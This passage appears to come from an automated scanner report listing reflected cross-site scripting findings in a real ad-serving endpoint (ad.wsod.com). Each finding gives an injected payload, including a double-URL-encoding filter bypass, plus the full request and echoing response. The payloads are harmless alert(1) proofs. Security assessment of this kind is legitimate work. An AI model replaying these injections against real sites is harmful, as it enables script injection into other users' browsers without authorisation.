<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x5024735";alert(1)//f66512879be/1300909666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298
...[SNIP]...

1.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed64%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf7cdda46ab was submitted in the REST URL parameter 3. This input was echoed as bed64"><script>alert(1)</script>df7cdda46ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50bed64%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf7cdda46ab/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2894

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50bed64"><script>alert(1)</script>df7cdda46ab/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81927"-alert(1)-"b11af9703e8 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=81927"-alert(1)-"b11af9703e8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=81927"-alert(1)-"b11af9703e8">
...[SNIP]...

1.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fda"><script>alert(1)</script>8661b5b0538 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=27fda"><script>alert(1)</script>8661b5b0538 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=27fda"><script>alert(1)</script>8661b5b0538http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8cfe"-alert(1)-"a49fee813c9 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805b8cfe"-alert(1)-"a49fee813c9&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805b8cfe"-alert(1)-"a49fee813c9&Values=1589&Redirect=">
...[SNIP]...

1.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Segments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 414d0"><script>alert(1)</script>e397680c65 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805414d0"><script>alert(1)</script>e397680c65&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2849

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805414d0"><script>alert(1)</script>e397680c65&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb93"-alert(1)-"6cd1cf6a25f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204fcb93"-alert(1)-"6cd1cf6a25f&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909479**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204fcb93"-alert(1)-"6cd1cf6a25f&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604
...[SNIP]...

1.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the TargetID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7003a"><script>alert(1)</script>66a223f4a71 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=52047003a"><script>alert(1)</script>66a223f4a71&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=52047003a"><script>alert(1)</script>66a223f4a71&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604
...[SNIP]...

1.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Values request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e210"><script>alert(1)</script>c51e3af3ea2 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15893e210"><script>alert(1)</script>c51e3af3ea2&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15893e210"><script>alert(1)</script>c51e3af3ea2&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72eaa"-alert(1)-"89a1f1cf7b8 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=158972eaa"-alert(1)-"89a1f1cf7b8&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=158972eaa"-alert(1)-"89a1f1cf7b8&Redirect=">
...[SNIP]...

1.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7ff"-alert(1)-"682d290d23b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click9d7ff"-alert(1)-"682d290d23b&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
